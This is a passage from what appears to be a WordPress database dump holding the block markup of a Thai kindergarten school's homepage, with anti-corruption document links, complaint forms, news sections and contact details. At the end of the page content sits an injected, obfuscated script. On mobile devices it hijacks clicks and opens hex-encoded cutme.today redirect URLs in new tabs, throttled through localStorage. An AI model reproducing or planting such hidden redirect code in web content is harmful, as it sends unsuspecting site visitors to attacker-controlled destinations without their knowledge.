{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:17:20','2025-07-15 07:17:20','',19,'http://watprato.ssk.in.th/?p=674',0,'revision','',0),
(675,1,'2025-07-15 14:19:10','2025-07-15 07:19:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 